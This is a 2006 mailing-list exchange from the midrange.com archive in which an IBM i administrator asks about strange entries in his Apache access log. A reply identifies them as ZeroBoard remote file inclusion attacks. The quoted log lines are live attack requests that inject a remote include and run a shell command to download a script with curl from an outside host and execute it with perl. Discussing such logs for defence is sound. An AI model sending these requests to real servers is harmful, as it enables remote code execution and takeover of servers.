|
See http://xforce.iss.net/xforce/xfdb/18893 for the gory details.It also means that the bad guys have taken over the server at www.rosmtp.bizland.com. I wonder - how come you don't have these entries in the error log as well? Do you use ZeroBoard?
Shalom Carmel
date: Fri, 17 Mar 2006 20:49:36 -0500 from: "Jim Franz" <franz400@xxxxxxxxxxxx> subject: odd stuff in apache access weblogWhy would our i5 Apache server process this?Not in the wwwerror log but in the wwwaccess log.Is it simply that these GETS caused no errors....?These 4 entries, which occurred several times today were the only entries out of 8,000 that were not our cgi programs."GET //bbs/skin/zero_vote/error.php?dir=http://www.rosmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://rosmtp.bizland.com/www;perl%20www HTTP/1.1 "GET /board/skin/zero_vote/error.php?dir=http://www.rosmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://rosmtp.bizland.com/www;perl%20www HTTP/1.1 "GET /zboard/skin/zero_vote/error.php?dir=http://www.rosmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://rosmtp.bizland.com/www;perl%20www HTTP/1.1 "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http://www.rosmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://rosmtp.bizland.com/www;perl%20www HTTP/1.1v5r3 jim franz
As an Amazon Associate we earn from qualifying purchases.
This mailing list archive is Copyright 1997-2024 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].
Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.
midrange.com
